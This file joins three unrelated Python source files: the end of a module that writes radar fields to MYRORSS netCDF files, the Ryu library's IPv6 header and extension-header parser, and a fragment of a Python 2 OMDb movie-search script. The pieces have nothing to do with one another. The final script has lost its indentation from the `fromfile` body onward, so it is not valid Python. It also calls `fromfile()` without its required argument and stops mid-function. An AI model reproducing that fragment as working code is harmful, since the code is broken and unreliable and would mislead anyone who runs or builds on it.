    return (numpy.flipud(field_matrix), grid_point_latitudes_deg[::-1],
            grid_point_longitudes_deg)
def write_field_to_myrorss_file(
        field_matrix, netcdf_file_name, field_name, metadata_dict,
        height_m_asl=None):
    """Writes field to MYRORSS-formatted file.

    M = number of rows (unique grid-point latitudes)
    N = number of columns (unique grid-point longitudes)

    :param field_matrix: M-by-N numpy array with one radar variable at one time.
        Latitude should increase down each column, and longitude should increase
        to the right along each row.
    :param netcdf_file_name: Path to output file.
    :param field_name: Name of radar field in GewitterGefahr format.
    :param metadata_dict: Dictionary created by either
        `gridrad_io.read_metadata_from_full_grid_file` or
        `read_metadata_from_raw_file`.
    :param height_m_asl: Height of radar field (metres above sea level).  Used
        only when `field_name` is reflectivity; otherwise the canonical height
        for the field is looked up.
    """

    # Reflectivity is the only field stored at a caller-chosen height; all
    # other fields have a fixed height defined by the MYRORSS convention.
    if field_name == radar_utils.REFL_NAME:
        field_to_heights_dict_m_asl = (
            myrorss_and_mrms_utils.fields_and_refl_heights_to_dict(
                field_names=[field_name],
                data_source=radar_utils.MYRORSS_SOURCE_ID,
                refl_heights_m_asl=numpy.array([height_m_asl])))
    else:
        field_to_heights_dict_m_asl = (
            myrorss_and_mrms_utils.fields_and_refl_heights_to_dict(
                field_names=[field_name],
                data_source=radar_utils.MYRORSS_SOURCE_ID))

    field_name = list(field_to_heights_dict_m_asl.keys())[0]
    radar_height_m_asl = field_to_heights_dict_m_asl[field_name][0]

    # MYRORSS stores echo tops in kilometres, not metres.
    if field_name in radar_utils.ECHO_TOP_NAMES:
        field_matrix = METRES_TO_KM * field_matrix
    field_name_myrorss = radar_utils.field_name_new_to_orig(
        field_name=field_name, data_source_name=radar_utils.MYRORSS_SOURCE_ID)

    file_system_utils.mkdir_recursive_if_necessary(file_name=netcdf_file_name)
    netcdf_dataset = Dataset(
        netcdf_file_name, 'w', format='NETCDF3_64BIT_OFFSET')

    # Global attributes describing the grid, as expected by MYRORSS readers.
    netcdf_dataset.setncattr(
        FIELD_NAME_COLUMN_ORIG, field_name_myrorss)
    netcdf_dataset.setncattr('DataType', 'SparseLatLonGrid')
    netcdf_dataset.setncattr(
        NW_GRID_POINT_LAT_COLUMN_ORIG, rounder.round_to_nearest(
            metadata_dict[radar_utils.NW_GRID_POINT_LAT_COLUMN],
            LATLNG_MULTIPLE_DEG))
    netcdf_dataset.setncattr(
        NW_GRID_POINT_LNG_COLUMN_ORIG, rounder.round_to_nearest(
            metadata_dict[radar_utils.NW_GRID_POINT_LNG_COLUMN],
            LATLNG_MULTIPLE_DEG))

    # BUG FIX: `numpy.float` was deprecated in NumPy 1.20 and removed in 1.24;
    # the builtin `float` is the documented replacement and is what the alias
    # pointed to anyway.
    netcdf_dataset.setncattr(
        HEIGHT_COLUMN_ORIG,
        METRES_TO_KM * float(radar_height_m_asl))
    netcdf_dataset.setncattr(
        UNIX_TIME_COLUMN_ORIG,
        numpy.int32(metadata_dict[radar_utils.UNIX_TIME_COLUMN]))
    netcdf_dataset.setncattr('FractionalTime', 0.)
    netcdf_dataset.setncattr('attributes', ' ColorMap SubType Unit')
    netcdf_dataset.setncattr('ColorMap-unit', 'dimensionless')
    netcdf_dataset.setncattr('ColorMap-value', '')
    netcdf_dataset.setncattr('SubType-unit', 'dimensionless')
    netcdf_dataset.setncattr('SubType-value', float(radar_height_m_asl))
    netcdf_dataset.setncattr('Unit-unit', 'dimensionless')
    netcdf_dataset.setncattr('Unit-value', 'dimensionless')

    netcdf_dataset.setncattr(
        LAT_SPACING_COLUMN_ORIG, rounder.round_to_nearest(
            metadata_dict[radar_utils.LAT_SPACING_COLUMN],
            LATLNG_MULTIPLE_DEG))
    netcdf_dataset.setncattr(
        LNG_SPACING_COLUMN_ORIG, rounder.round_to_nearest(
            metadata_dict[radar_utils.LNG_SPACING_COLUMN],
            LATLNG_MULTIPLE_DEG))
    netcdf_dataset.setncattr(
        SENTINEL_VALUE_COLUMNS_ORIG[0], numpy.double(-99000.))
    netcdf_dataset.setncattr(
        SENTINEL_VALUE_COLUMNS_ORIG[1], numpy.double(-99001.))

    # Southernmost latitude, derived from the NW corner and grid spacing.
    min_latitude_deg = metadata_dict[radar_utils.NW_GRID_POINT_LAT_COLUMN] - (
        metadata_dict[radar_utils.LAT_SPACING_COLUMN] *
        (metadata_dict[radar_utils.NUM_LAT_COLUMN] - 1))
    unique_grid_point_lats_deg, unique_grid_point_lngs_deg = (
        grids.get_latlng_grid_points(
            min_latitude_deg=min_latitude_deg,
            min_longitude_deg=
            metadata_dict[radar_utils.NW_GRID_POINT_LNG_COLUMN],
            lat_spacing_deg=metadata_dict[radar_utils.LAT_SPACING_COLUMN],
            lng_spacing_deg=metadata_dict[radar_utils.LNG_SPACING_COLUMN],
            num_rows=metadata_dict[radar_utils.NUM_LAT_COLUMN],
            num_columns=metadata_dict[radar_utils.NUM_LNG_COLUMN]))

    num_grid_rows = len(unique_grid_point_lats_deg)
    num_grid_columns = len(unique_grid_point_lngs_deg)
    field_vector = numpy.reshape(field_matrix, num_grid_rows * num_grid_columns)

    grid_point_lat_matrix, grid_point_lng_matrix = (
        grids.latlng_vectors_to_matrices(
            unique_grid_point_lats_deg, unique_grid_point_lngs_deg))
    grid_point_lat_vector = numpy.reshape(
        grid_point_lat_matrix, num_grid_rows * num_grid_columns)
    grid_point_lng_vector = numpy.reshape(
        grid_point_lng_matrix, num_grid_rows * num_grid_columns)

    # Only non-NaN values are written (this is a sparse-grid format).
    real_value_indices = numpy.where(numpy.invert(numpy.isnan(field_vector)))[0]

    # NOTE(review): dimensions are declared one smaller than the actual grid;
    # this mirrors the MYRORSS sparse-grid convention -- confirm against the
    # corresponding reader before changing.
    netcdf_dataset.createDimension(
        NUM_LAT_COLUMN_ORIG, num_grid_rows - 1)
    netcdf_dataset.createDimension(
        NUM_LNG_COLUMN_ORIG, num_grid_columns - 1)
    netcdf_dataset.createDimension(
        NUM_PIXELS_COLUMN_ORIG, len(real_value_indices))

    row_index_vector, column_index_vector = radar_utils.latlng_to_rowcol(
        grid_point_lat_vector, grid_point_lng_vector,
        nw_grid_point_lat_deg=
        metadata_dict[radar_utils.NW_GRID_POINT_LAT_COLUMN],
        nw_grid_point_lng_deg=
        metadata_dict[radar_utils.NW_GRID_POINT_LNG_COLUMN],
        lat_spacing_deg=metadata_dict[radar_utils.LAT_SPACING_COLUMN],
        lng_spacing_deg=metadata_dict[radar_utils.LNG_SPACING_COLUMN])

    netcdf_dataset.createVariable(
        field_name_myrorss, numpy.single, (NUM_PIXELS_COLUMN_ORIG,))
    netcdf_dataset.createVariable(
        GRID_ROW_COLUMN_ORIG, numpy.int16, (NUM_PIXELS_COLUMN_ORIG,))
    netcdf_dataset.createVariable(
        GRID_COLUMN_COLUMN_ORIG, numpy.int16, (NUM_PIXELS_COLUMN_ORIG,))
    netcdf_dataset.createVariable(
        NUM_GRID_CELL_COLUMN_ORIG, numpy.int32, (NUM_PIXELS_COLUMN_ORIG,))

    netcdf_dataset.variables[field_name_myrorss].setncattr(
        'BackgroundValue', numpy.int32(-99900))
    netcdf_dataset.variables[field_name_myrorss].setncattr(
        'units', 'dimensionless')
    netcdf_dataset.variables[field_name_myrorss].setncattr(
        'NumValidRuns', numpy.int32(len(real_value_indices)))

    netcdf_dataset.variables[field_name_myrorss][:] = field_vector[
        real_value_indices]
    netcdf_dataset.variables[GRID_ROW_COLUMN_ORIG][:] = (
        row_index_vector[real_value_indices])
    netcdf_dataset.variables[GRID_COLUMN_COLUMN_ORIG][:] = (
        column_index_vector[real_value_indices])
    # Each run covers exactly one grid cell.
    netcdf_dataset.variables[NUM_GRID_CELL_COLUMN_ORIG][:] = (
        numpy.full(len(real_value_indices), 1, dtype=int))

    netcdf_dataset.close()
| |
# Copyright (C) 2012 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import abc
import six
import struct
from . import packet_base
from . import icmpv6
from . import tcp
from . import udp
from . import sctp
from . import gre
from . import in_proto as inet
from ryu.lib import addrconv
from ryu.lib import stringify
IPV6_ADDRESS_PACK_STR = '!16s'
IPV6_ADDRESS_LEN = struct.calcsize(IPV6_ADDRESS_PACK_STR)
IPV6_PSEUDO_HEADER_PACK_STR = '!16s16s3xB'
class ipv6(packet_base.PacketBase):
    """IPv6 (RFC 2460) header encoder/decoder class.

    An instance has the following attributes at least.
    Most of them are same to the on-wire counterparts but in host byte order.
    IPv6 addresses are represented as a string like 'ff02::1'.
    __init__ takes the corresponding args in this order.

    .. tabularcolumns:: |l|p{30em}|l|

    ============== ======================================== ==================
    Attribute      Description                              Example
    ============== ======================================== ==================
    version        Version
    traffic_class  Traffic Class
    flow_label     When decoding, Flow Label.
                   When encoding, the most significant 8
                   bits of Flow Label.
    payload_length Payload Length
    nxt            Next Header
    hop_limit      Hop Limit
    src            Source Address                           'ff02::1'
    dst            Destination Address                      '::'
    ext_hdrs       Extension Headers
    ============== ======================================== ==================
    """
    # Fixed 40-octet base header: ver/tc/flow (I), payload length (H),
    # next header (B), hop limit (B), then src and dst addresses (16s each).
    _PACK_STR = '!IHBB16s16s'
    _MIN_LEN = struct.calcsize(_PACK_STR)
    # Maps a protocol number to its extension-header decoder class;
    # populated via the register_header_type decorator below.
    _IPV6_EXT_HEADER_TYPE = {}
    # presumably consumed by the stringify/packet_base machinery to mark
    # which attributes are ascii address strings -- confirm in packet_base
    _TYPE = {
        'ascii': [
            'src', 'dst'
        ]
    }
    @staticmethod
    def register_header_type(type_):
        # Class decorator: registers `cls` as the decoder for protocol
        # number `type_` in the extension-header dispatch table.
        def _register_header_type(cls):
            ipv6._IPV6_EXT_HEADER_TYPE[type_] = cls
            return cls
        return _register_header_type
    def __init__(self, version=6, traffic_class=0, flow_label=0,
                 payload_length=0, nxt=inet.IPPROTO_TCP, hop_limit=255,
                 src='10::10', dst='20::20', ext_hdrs=None):
        super(ipv6, self).__init__()
        self.version = version
        self.traffic_class = traffic_class
        self.flow_label = flow_label
        # 0 means "compute from payload + extension headers" in serialize().
        self.payload_length = payload_length
        self.nxt = nxt
        self.hop_limit = hop_limit
        self.src = src
        self.dst = dst
        ext_hdrs = ext_hdrs or []
        assert isinstance(ext_hdrs, list)
        for ext_hdr in ext_hdrs:
            # Every extension header must subclass the `header` ABC.
            assert isinstance(ext_hdr, header)
        self.ext_hdrs = ext_hdrs
    @classmethod
    def parser(cls, buf):
        """Decode an IPv6 packet from *buf*.

        Returns a (ipv6 instance, payload parser class, payload bytes)
        tuple, following the PacketBase parser convention.
        """
        (v_tc_flow, payload_length, nxt, hlim, src, dst) = struct.unpack_from(
            cls._PACK_STR, buf)
        # First 32 bits: version (4) | traffic class (8) | flow label (20).
        version = v_tc_flow >> 28
        traffic_class = (v_tc_flow >> 20) & 0xff
        flow_label = v_tc_flow & 0xfffff
        hop_limit = hlim
        offset = cls._MIN_LEN
        last = nxt
        ext_hdrs = []
        # Walk the Next Header chain, decoding each registered extension
        # header; stop at the first value with no registered decoder
        # (i.e. the upper-layer protocol).
        # NOTE(review): a decoder's parser may return None for unknown
        # subtypes (see routing.parser), which would make len(hdr) raise
        # here -- confirm upstream handling.
        while True:
            cls_ = cls._IPV6_EXT_HEADER_TYPE.get(last)
            if not cls_:
                break
            hdr = cls_.parser(buf[offset:])
            ext_hdrs.append(hdr)
            offset += len(hdr)
            last = hdr.nxt
        msg = cls(version, traffic_class, flow_label, payload_length,
                  nxt, hop_limit, addrconv.ipv6.bin_to_text(src),
                  addrconv.ipv6.bin_to_text(dst), ext_hdrs)
        return (msg, ipv6.get_packet_type(last),
                buf[offset:offset + payload_length])
    def serialize(self, payload, prev):
        """Encode this header (and its extension headers) to a bytearray."""
        hdr = bytearray(40)
        v_tc_flow = (self.version << 28 | self.traffic_class << 20 |
                     self.flow_label)
        struct.pack_into(ipv6._PACK_STR, hdr, 0, v_tc_flow,
                         self.payload_length, self.nxt, self.hop_limit,
                         addrconv.ipv6.text_to_bin(self.src),
                         addrconv.ipv6.text_to_bin(self.dst))
        if self.ext_hdrs:
            for ext_hdr in self.ext_hdrs:
                hdr.extend(ext_hdr.serialize())
        if 0 == self.payload_length:
            # Auto-compute payload length (payload plus all extension
            # headers) when the caller left it at the default of 0, then
            # patch the already-packed length field at byte offset 4.
            payload_length = len(payload)
            for ext_hdr in self.ext_hdrs:
                payload_length += len(ext_hdr)
            self.payload_length = payload_length
            struct.pack_into('!H', hdr, 4, self.payload_length)
        return hdr
    def __len__(self):
        # Base header plus the encoded size of every extension header.
        ext_hdrs_len = 0
        for ext_hdr in self.ext_hdrs:
            ext_hdrs_len += len(ext_hdr)
        return self._MIN_LEN + ext_hdrs_len
# Register upper-layer protocol decoders so ipv6.parser can return the
# right payload class for the final Next Header value (see the
# ipv6.get_packet_type call in parser).
ipv6.register_packet_type(icmpv6.icmpv6, inet.IPPROTO_ICMPV6)
ipv6.register_packet_type(tcp.tcp, inet.IPPROTO_TCP)
ipv6.register_packet_type(udp.udp, inet.IPPROTO_UDP)
ipv6.register_packet_type(sctp.sctp, inet.IPPROTO_SCTP)
ipv6.register_packet_type(gre.gre, inet.IPPROTO_GRE)
@six.add_metaclass(abc.ABCMeta)
class header(stringify.StringifyMixin):
    """Abstract base class for IPv6 extension headers.

    Concrete subclasses must implement ``parser``, ``serialize`` and
    ``__len__``.
    """
    def __init__(self, nxt):
        # Next Header: protocol number of the header that follows this one.
        self.nxt = nxt
    @classmethod
    @abc.abstractmethod
    def parser(cls, buf):
        """Decode one extension header from the start of *buf*."""
        pass
    @abc.abstractmethod
    def serialize(self):
        """Encode this extension header to bytes."""
        pass
    @abc.abstractmethod
    def __len__(self):
        """Return the encoded length of this header in octets."""
        pass
class opt_header(header):
    """an abstract class for Hop-by-Hop Options header and destination
    header."""
    # Fixed fields: Next Header (B) and Hdr Ext Len (B).
    _PACK_STR = '!BB'
    _MIN_LEN = struct.calcsize(_PACK_STR)
    # Size of the mandatory first 8 octets of the header.
    _FIX_SIZE = 8
    _class_prefixes = ['option']
    @abc.abstractmethod
    def __init__(self, nxt, size, data):
        super(opt_header, self).__init__(nxt)
        # size is an octet count and must be a multiple of 8.
        # NOTE(review): RFC 2460 defines Hdr Ext Len in 8-octet units; this
        # implementation treats the field as a raw octet count -- confirm
        # against a peer implementation before relying on interoperability.
        assert not (size % 8)
        self.size = size
        self.data = data
    @classmethod
    def parser(cls, buf):
        (nxt, len_) = struct.unpack_from(cls._PACK_STR, buf)
        # Total octets to consume: mandatory 8 plus the advertised length.
        data_len = cls._FIX_SIZE + int(len_)
        data = []
        size = cls._MIN_LEN
        while size < data_len:
            (type_, ) = struct.unpack_from('!B', buf[size:])
            if type_ == 0:
                # Pad1 option: a single zero octet with no length/data.
                opt = option(type_, -1, None)
                size += 1
            else:
                opt = option.parser(buf[size:])
                size += len(opt)
            data.append(opt)
        return cls(nxt, len_, data)
    def serialize(self):
        buf = struct.pack(self._PACK_STR, self.nxt, self.size)
        buf = bytearray(buf)
        if self.data is None:
            # With no options supplied, emit a PadN option so the header
            # still occupies a full 8-octet unit.  Note this mutates
            # self.data as a side effect.
            self.data = [option(type_=1, len_=4,
                                data=b'\x00\x00\x00\x00')]
        for opt in self.data:
            buf.extend(opt.serialize())
        return buf
    def __len__(self):
        # Mandatory 8 octets plus the variable part.
        return self._FIX_SIZE + self.size
@ipv6.register_header_type(inet.IPPROTO_HOPOPTS)
class hop_opts(opt_header):
    """IPv6 (RFC 2460) Hop-by-Hop Options header encoder/decoder class.

    This is used with ryu.lib.packet.ipv6.ipv6.
    An instance has the following attributes at least.
    Most of them are same to the on-wire counterparts but in host byte order.
    __init__ takes the corresponding args in this order.

    .. tabularcolumns:: |l|L|

    ============== =======================================
    Attribute      Description
    ============== =======================================
    nxt            Next Header
    size           the length of the Hop-by-Hop Options header,
                   not include the first 8 octet.
    data           IPv6 options.
    ============== =======================================
    """
    # Protocol number this class is registered under in ipv6's
    # extension-header dispatch table.
    TYPE = inet.IPPROTO_HOPOPTS
    def __init__(self, nxt=inet.IPPROTO_TCP, size=0, data=None):
        # All parsing/serializing behavior is inherited from opt_header.
        super(hop_opts, self).__init__(nxt, size, data)
@ipv6.register_header_type(inet.IPPROTO_DSTOPTS)
class dst_opts(opt_header):
    """IPv6 (RFC 2460) destination header encoder/decoder class.

    This is used with ryu.lib.packet.ipv6.ipv6.
    An instance has the following attributes at least.
    Most of them are same to the on-wire counterparts but in host byte order.
    __init__ takes the corresponding args in this order.

    .. tabularcolumns:: |l|L|

    ============== =======================================
    Attribute      Description
    ============== =======================================
    nxt            Next Header
    size           the length of the destination header,
                   not include the first 8 octet.
    data           IPv6 options.
    ============== =======================================
    """
    # Protocol number this class is registered under in ipv6's
    # extension-header dispatch table.
    TYPE = inet.IPPROTO_DSTOPTS
    def __init__(self, nxt=inet.IPPROTO_TCP, size=0, data=None):
        # All parsing/serializing behavior is inherited from opt_header.
        super(dst_opts, self).__init__(nxt, size, data)
class option(stringify.StringifyMixin):
    """IPv6 (RFC 2460) Options header encoder/decoder class.

    This is used with ryu.lib.packet.ipv6.hop_opts or
    ryu.lib.packet.ipv6.dst_opts.
    An instance has the following attributes at least.
    Most of them are same to the on-wire counterparts but in host byte order.
    __init__ takes the corresponding args in this order.

    .. tabularcolumns:: |l|L|

    ============== =======================================
    Attribute      Description
    ============== =======================================
    type\_         option type.
    len\_          the length of data. -1 if type\_ is 0.
    data           an option value. None if len\_ is 0 or -1.
    ============== =======================================
    """
    # Option Type (B) followed by Opt Data Len (B).
    _PACK_STR = '!BB'
    _MIN_LEN = struct.calcsize(_PACK_STR)
    def __init__(self, type_=0, len_=-1, data=None):
        self.type_ = type_
        self.len_ = len_
        self.data = data
    @classmethod
    def parser(cls, buf):
        """Decode a single option from the start of *buf*."""
        (opt_type, ) = struct.unpack_from('!B', buf)
        if not opt_type:
            # Pad1: a lone zero octet with neither length nor data fields.
            return cls(opt_type, -1, None)
        (opt_type, opt_len) = struct.unpack_from(cls._PACK_STR, buf)
        value = None
        if opt_len:
            (value, ) = struct.unpack_from('%ds' % opt_len, buf,
                                           cls._MIN_LEN)
        return cls(opt_type, opt_len, value)
    def serialize(self):
        """Encode this option to bytes."""
        if not self.type_:
            # Pad1 serializes as a single zero octet.
            return struct.pack('!B', self.type_)
        if not self.len_:
            # Type/length only; no option data.
            return struct.pack(self._PACK_STR, self.type_, self.len_)
        return struct.pack(self._PACK_STR + '%ds' % self.len_,
                           self.type_, self.len_, self.data)
    def __len__(self):
        # Two fixed octets plus the data length (len_ is -1 for Pad1,
        # which correctly yields 1).
        return self._MIN_LEN + self.len_
@ipv6.register_header_type(inet.IPPROTO_ROUTING)
class routing(header):
    """An IPv6 Routing Header decoder class.

    This class has only the parser method.

    IPv6 Routing Header types.
    http://www.iana.org/assignments/ipv6-parameters/ipv6-parameters.xhtml

    +-----------+----------------------------------+-------------------+
    | Value     | Description                      | Reference         |
    +===========+==================================+===================+
    | 0         | Source Route (DEPRECATED)        | [[IPV6]][RFC5095] |
    +-----------+----------------------------------+-------------------+
    | 1         | Nimrod (DEPRECATED 2009-05-06)   |                   |
    +-----------+----------------------------------+-------------------+
    | 2         | Type 2 Routing Header            | [RFC6275]         |
    +-----------+----------------------------------+-------------------+
    | 3         | RPL Source Route Header          | [RFC6554]         |
    +-----------+----------------------------------+-------------------+
    | 4 - 252   | Unassigned                       |                   |
    +-----------+----------------------------------+-------------------+
    | 253       | RFC3692-style Experiment 1 [2]   | [RFC4727]         |
    +-----------+----------------------------------+-------------------+
    | 254       | RFC3692-style Experiment 2 [2]   | [RFC4727]         |
    +-----------+----------------------------------+-------------------+
    | 255       | Reserved                         |                   |
    +-----------+----------------------------------+-------------------+
    """
    TYPE = inet.IPPROTO_ROUTING
    _OFFSET_LEN = struct.calcsize('!2B')
    # IPv6 Routing Header Type
    ROUTING_TYPE_2 = 0x02
    ROUTING_TYPE_3 = 0x03
    @classmethod
    def parser(cls, buf):
        """Dispatch to the decoder for this buffer's Routing Type.

        Returns None for routing types without a decoder.
        """
        # The Routing Type octet sits just after Next Header + Hdr Ext Len.
        (routing_type, ) = struct.unpack_from('!B', buf, cls._OFFSET_LEN)
        # TODO: make parsers of type2.
        if routing_type == cls.ROUTING_TYPE_3:
            return routing_type3.parser(buf)
        return None
class routing_type3(header):
    """
    An IPv6 Routing Header for Source Routes with the RPL (RFC 6554)
    encoder/decoder class.

    This is used with ryu.lib.packet.ipv6.ipv6.
    An instance has the following attributes at least.
    Most of them are same to the on-wire counterparts but in host byte order.
    __init__ takes the corresponding args in this order.

    .. tabularcolumns:: |l|L|

    ============== =======================================
    Attribute      Description
    ============== =======================================
    nxt            Next Header
    size           The length of the Routing header,
                   not include the first 8 octet.
                   (0 means automatically-calculate when encoding)
    type           Identifies the particular Routing header variant.
    seg            Number of route segments remaining.
    cmpi           Number of prefix octets from segments 1 through n-1.
    cmpe           Number of prefix octets from segment n.
    pad            Number of octets that are used for padding
                   after Address[n] at the end of the SRH.
    adrs           Vector of addresses, numbered 1 to n.
    ============== =======================================
    """
    # nxt (B), size (B), type (B), seg (B), cmpi|cmpe nibbles (B),
    # pad nibble + reserved (B), then 2 reserved octets.
    _PACK_STR = '!BBBBBB2x'
    _MIN_LEN = struct.calcsize(_PACK_STR)
    _TYPE = {
        'asciilist': [
            'adrs'
        ]
    }
    def __init__(self, nxt=inet.IPPROTO_TCP, size=0,
                 type_=3, seg=0, cmpi=0, cmpe=0, adrs=None):
        super(routing_type3, self).__init__(nxt)
        self.size = size
        self.type_ = type_
        self.seg = seg
        self.cmpi = cmpi
        self.cmpe = cmpe
        adrs = adrs or []
        assert isinstance(adrs, list)
        self.adrs = adrs
        # Padding needed to round the compressed address block up to a
        # multiple of 8 octets.  The parenthesization differs from the
        # RFC 6554 formula (the inner % 8 binds only to (16 - cmpe)), but
        # because of the outer % 8 the result is congruent mod 8 and thus
        # identical.
        self._pad = (8 - ((len(self.adrs) - 1) * (16 - self.cmpi) +
                          (16 - self.cmpe) % 8)) % 8
    @classmethod
    def _get_size(cls, size):
        # Hdr Ext Len is in 8-octet units, not counting the first 8 octets.
        return (int(size) + 1) * 8
    @classmethod
    def parser(cls, buf):
        (nxt, size, type_, seg, cmp_, pad) = struct.unpack_from(
            cls._PACK_STR, buf)
        data = cls._MIN_LEN
        header_len = cls._get_size(size)
        # CmprI / CmprE share one octet (high / low nibble).
        cmpi = int(cmp_ >> 4)
        cmpe = int(cmp_ & 0xf)
        # Pad occupies the high nibble of its octet.
        pad = int(pad >> 4)
        adrs = []
        if size:
            # Address[1..n-1] has size (16 - CmprI) octets
            adrs_len_i = 16 - cmpi
            # Address[n] has size (16 - CmprE) octets
            adrs_len_e = 16 - cmpe
            form_i = "%ds" % adrs_len_i
            form_e = "%ds" % adrs_len_e
            # Read the intermediate addresses, restoring the elided common
            # prefix with zero bytes before converting to text.
            while data < (header_len - (adrs_len_e + pad)):
                (adr, ) = struct.unpack_from(form_i, buf[data:])
                adr = (b'\x00' * cmpi) + adr
                adrs.append(addrconv.ipv6.bin_to_text(adr))
                data += adrs_len_i
            # The final address uses the CmprE compression instead.
            (adr, ) = struct.unpack_from(form_e, buf[data:])
            adr = (b'\x00' * cmpe) + adr
            adrs.append(addrconv.ipv6.bin_to_text(adr))
        return cls(nxt, size, type_, seg, cmpi, cmpe, adrs)
    def serialize(self):
        if self.size == 0:
            # Auto-compute Hdr Ext Len (in 8-octet units) from the
            # compressed address block plus padding.
            self.size = ((len(self.adrs) - 1) * (16 - self.cmpi) +
                         (16 - self.cmpe) + self._pad) // 8
        buf = struct.pack(self._PACK_STR, self.nxt, self.size,
                          self.type_, self.seg, (self.cmpi << 4) | self.cmpe,
                          self._pad << 4)
        buf = bytearray(buf)
        if self.size:
            form_i = "%ds" % (16 - self.cmpi)
            form_e = "%ds" % (16 - self.cmpe)
            # Drop the first cmpi/cmpe octets (the shared prefix) from each
            # 16-byte address before writing it.
            slice_i = slice(self.cmpi, 16)
            slice_e = slice(self.cmpe, 16)
            for adr in self.adrs[:-1]:
                buf.extend(
                    struct.pack(
                        form_i, addrconv.ipv6.text_to_bin(adr)[slice_i]))
            buf.extend(struct.pack(
                form_e,
                addrconv.ipv6.text_to_bin(self.adrs[-1])[slice_e]))
        return buf
    def __len__(self):
        return routing_type3._get_size(self.size)
@ipv6.register_header_type(inet.IPPROTO_FRAGMENT)
class fragment(header):
    """IPv6 (RFC 2460) fragment header encoder/decoder class.

    This is used with ryu.lib.packet.ipv6.ipv6.
    An instance has the following attributes at least.
    Most of them are same to the on-wire counterparts but in host byte order.
    __init__ takes the corresponding args in this order.

    .. tabularcolumns:: |l|L|

    ============== =======================================
    Attribute      Description
    ============== =======================================
    nxt            Next Header
    offset         offset, in 8-octet units, relative to
                   the start of the fragmentable part of
                   the original packet.
    more           1 means more fragments follow;
                   0 means last fragment.
    id\_           packet identification value.
    ============== =======================================
    """
    TYPE = inet.IPPROTO_FRAGMENT
    # nxt (B), reserved (x), offset/flags (H), identification (I).
    _PACK_STR = '!BxHI'
    _MIN_LEN = struct.calcsize(_PACK_STR)
    def __init__(self, nxt=inet.IPPROTO_TCP, offset=0, more=0, id_=0):
        super(fragment, self).__init__(nxt)
        self.offset = offset
        self.more = more
        self.id_ = id_
    @classmethod
    def parser(cls, buf):
        """Decode a fragment header from the start of *buf*."""
        (nxt, off_flags, ident) = struct.unpack_from(cls._PACK_STR, buf)
        # The 16-bit field packs the 13-bit offset (high) with the M flag
        # in bit 0; bits 1-2 are reserved.
        return cls(nxt, off_flags >> 3, off_flags & 0x1, ident)
    def serialize(self):
        """Encode this fragment header to bytes."""
        return struct.pack(self._PACK_STR, self.nxt,
                           self.offset << 3 | self.more, self.id_)
    def __len__(self):
        # Fragment headers are always exactly 8 octets.
        return self._MIN_LEN
@ipv6.register_header_type(inet.IPPROTO_AH)
class auth(header):
    """IP Authentication header (RFC 2402) encoder/decoder class.

    This is used with ryu.lib.packet.ipv6.ipv6.
    An instance has the following attributes at least.
    Most of them are same to the on-wire counterparts but in host byte order.
    __init__ takes the corresponding args in this order.

    .. tabularcolumns:: |l|L|

    ============== =======================================
    Attribute      Description
    ============== =======================================
    nxt            Next Header
    size           the length of the Authentication Header
                   in 64-bit words, subtracting 1.
    spi            security parameters index.
    seq            sequence number.
    data           authentication data.
    ============== =======================================
    """
    TYPE = inet.IPPROTO_AH
    # nxt (B), payload len (B), 2 reserved octets, SPI (I), sequence (I).
    _PACK_STR = '!BB2xII'
    _MIN_LEN = struct.calcsize(_PACK_STR)
    def __init__(self, nxt=inet.IPPROTO_TCP, size=2, spi=0, seq=0,
                 data=b'\x00\x00\x00\x00'):
        super(auth, self).__init__(nxt)
        assert data is not None
        self.size = size
        self.spi = spi
        self.seq = seq
        self.data = data
    @classmethod
    def _get_size(cls, size):
        # The on-wire length field counts 32-bit words minus 2, so the
        # total header size in octets is (size + 2) * 4.
        return (int(size) + 2) * 4
    @classmethod
    def parser(cls, buf):
        """Decode an Authentication Header from the start of *buf*."""
        (nxt, size, spi, seq) = struct.unpack_from(cls._PACK_STR, buf)
        # Whatever follows the fixed fields up to the declared size is the
        # integrity check value (authentication data).
        icv_len = cls._get_size(size) - cls._MIN_LEN
        (data, ) = struct.unpack_from("%ds" % icv_len, buf, cls._MIN_LEN)
        return cls(nxt, size, spi, seq, data)
    def serialize(self):
        """Encode this Authentication Header to a bytearray."""
        buf = bytearray(struct.pack(self._PACK_STR, self.nxt, self.size,
                                    self.spi, self.seq))
        icv_len = auth._get_size(self.size) - self._MIN_LEN
        buf.extend(struct.pack("%ds" % icv_len, self.data))
        return buf
    def __len__(self):
        return auth._get_size(self.size)
# Expose the extension-header classes to the base-class machinery.
# NOTE(review): set_classes is inherited from packet_base.PacketBase --
# confirm its exact contract there.
ipv6.set_classes(ipv6._IPV6_EXT_HEADER_TYPE)
| |
#===============================================================================
# OMDb API Search Script - Module - getdat
#-------------------------------------------------------------------------------
# Version: 0.1.3
# Updated: 03-11-2013
# Author: Alex C.
# License: MIT
#-------------------------------------------------------------------------------
# Notes
#===============================================================================
"""
Contains functions for retrieving movie data, either from a JSON file,
or from the OMDb API.
"""
#===============================================================================
# IMPORTS
#===============================================================================
import glob
import json
import msvcrt
import urllib2
from const import *
import dispdat
#===============================================================================
# LOCAL CACHE FOR STORING PAST SEARCHES
#===============================================================================
cache = []
#===============================================================================
# GET USER INPUT
#===============================================================================
def getinput (msg=""):
    """Prompt the user with *msg* and return the line they enter.

    :param msg: Prompt string shown to the user (may be empty).
    :return: The string typed by the user.
    """
    # NOTE(review): an older msvcrt.getch()-based branch for DOS/Windows was
    # commented out here; raw_input behaves the same on every platform this
    # script targets, so the dead code has been removed.
    return raw_input(msg)
#===============================================================================
# GET DATA FROM JSON FILE
#===============================================================================
def fromfile (filelist, ret=False):
""""""
global cache
dupe = False
thefile = None
choice = None
loaded = None
print HR
userinput = getinput("File: ")
try:
choice = (int(userinput) - 1)
except:
choice = userinput
try:
if choice is not "":
if type(choice) is int:
thefile = open(filelist[choice], 'r')
loaded = filelist[choice]
elif type(choice) is str:
thefile = open(choice, 'r')
loaded = choice
except (IOError, IndexError):
print "Can't find that file." + NL
return fromfile()
if thefile is not None:
movdata = json.load(thefile)
for mov in movdata:
for mov2 in cache:
if mov[MKEY[1]] == mov2[MKEY[1]]:
dupe = True
if not dupe:
cache.append(mov)
print "File loaded."
